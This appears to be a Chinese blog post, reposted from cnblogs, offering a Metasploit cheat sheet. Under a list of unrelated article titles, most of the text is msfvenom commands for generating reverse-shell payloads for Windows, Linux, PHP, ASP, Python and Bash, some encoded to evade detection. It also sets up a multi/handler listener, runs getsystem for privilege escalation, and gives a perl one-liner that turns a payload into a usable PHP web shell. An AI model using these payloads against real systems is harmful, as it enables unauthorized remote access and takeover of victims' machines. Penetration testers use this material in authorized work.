1、生成反弹木马(脚本,执行程序)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe

2、MSF接受设置

1 use exploit/multi/handler

2 set payload windows/meterpreter/reverse_tcp

3 set LHOST 192.168.1.111

4 Exploit

3、采用自动化提权,调用其他EXP进行提权

Getuid 查看当前权限

Getsystem 自动化提升

4、MSF Payloads

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

2 msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

3 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

4 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

MSF 生成在 Linux 下反弹的 Meterpreter Shell

1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF 生成反弹 Shell (C Shellcode)

1 msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

MSF 生成反弹 Python Shell

1 msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF 生成反弹 ASP Shell

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

MSF 生成反弹 Bash Shell

1 msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

MSF 生成反弹 PHP Shell

1 msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

2 add <?php at the beginning

3 perl -i~ -0777pe's/^/<?php \n/' shell.php

MSF 生成反弹 Win Shell

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

from:http://www.cnblogs.com/sqyysec/p/6915492.html

最新文章

  1. Windows版的各种Python库安装包下载地址与安装过程
  2. Beta版本冲刺———第三天
  3. python 学习笔记6(数据库 sqlite)
  4. 使用ASP.NET操作IIS7中使用应用程序
  5. 系统后台图表生成文档说明-javascript
  6. ifndef系列
  7. php 学习路线 赵兴壮2014年4月28 日 加油
  8. uwsgi服务启动(start)停止(stop)重新装载(reload)
  9. MySQL - 高可用性:少宕机即高可用?
  10. qt连接数据库Sqlite
  11. 5.cgroup资源控制
  12. 网页分帧操作&lt;frameset&gt;,&lt;iframe&gt;标签
  13. Nginx 多域名配置
  14. ubuntu下安装owncloud提示没有zip模块时
  15. js 的date的format时间,获取当前时间,前一天的日期
  16. 自学Zabbix3.5.1-监控项item-key介绍
  17. 小数点保留若干位小数 %.*f
  18. Centos 批量分发脚本
  19. iOS之safari调试iOS app web页面
  20. hibernate的注解属性mappedBy详解【实际项目】

热门文章

  1. 上线---苹果AppStore审核注意事项,Guideline 1.2 - Safety - User Generated Content,2.1等条例(苹果审核六次拒绝)
  2. iOS 技术篇: 如何利用dsym文件分析苹果被拒日志
  3. 每日踩坑 2019-04-08 VS2015未能找到路径“…\bin\roslyn\csc.exe”的解决方案
  4. Java表达式转型规则
  5. 如何实现跨域获取iframe子页面动态的url
  6. sqlite 一条记录判断一个字段是否like另一个字段
  7. 关于产品UE的胡思乱想
  8. Go语言之高级篇beego框架之模型(Models)
  9. C#中流的读写器BinaryReader、BinaryWriter,StreamReader、StreamWriter详解【转】
  10. Amazon.com 美国亚马逊 直邮中国 手把手教程(转)